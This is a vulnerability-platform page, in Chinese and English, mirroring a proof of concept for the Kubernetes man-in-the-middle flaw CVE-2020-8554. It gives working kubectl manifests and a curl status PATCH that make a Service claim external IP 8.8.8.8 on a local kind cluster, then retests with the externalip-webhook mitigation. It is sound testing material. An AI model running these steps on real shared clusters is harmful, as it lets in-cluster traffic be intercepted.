漏洞平台

POC详情： 5ba655ff33ebdde1d64280c927eb44f8cdfc4b0b

来源

https://github.com/Dviejopomata/CVE-2020-8554

关联漏洞

标题： Kubernetes 安全漏洞 (CVE-2020-8554)
描述：Kubernetes是美国Linux基金会的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。 Kubernetes 存在安全漏洞，攻击者可利用该漏洞可以通过Kubernetes上的LoadBalancer ExternalIP充当中间人，以便在会话中读取或写入数据。

介绍

# Create Kubernetes cluster
```bash
kind create cluster  --config ./kind.yaml
```

The cluster must have certmanager:
https://cert-manager.io/docs/installation/kubernetes/

# Test vulnerability
```bash
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
  name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: echoserver
  namespace: kubeproxy-mitm
spec:
  replicas: 1
  selector:
    matchLabels:
      app: echoserver
  template:
    metadata:
      labels:
        app: echoserver
    spec:
      containers:
      - image: gcr.io/google_containers/echoserver:1.10
        name: echoserver
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
EOF

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF

kubectl proxy --port=8080

curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'

# check external IP 
kubectl get svc -n kubeproxy-mitm 
```

# Test the vulnerability
Deploy the webhook from https://github.com/kubernetes-sigs/externalip-webhook
```bash
kubectl apply -f ./externalip-webhook.yaml

kubectl delete svc -n kubeproxy-mitm mitm-lb  

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
    - 8.8.8.8
  type: LoadBalancer
EOF
curl -k -v -XPATCH  -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'

```

文件快照


 [4.0K]  /data/pocs/5ba655ff33ebdde1d64280c927eb44f8cdfc4b0b
├── [4.1K]  externalip-webhook.yaml
├── [ 150]  kind.yaml
├── [2.1K]  README.md
└── [ 287]  svc.yaml

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。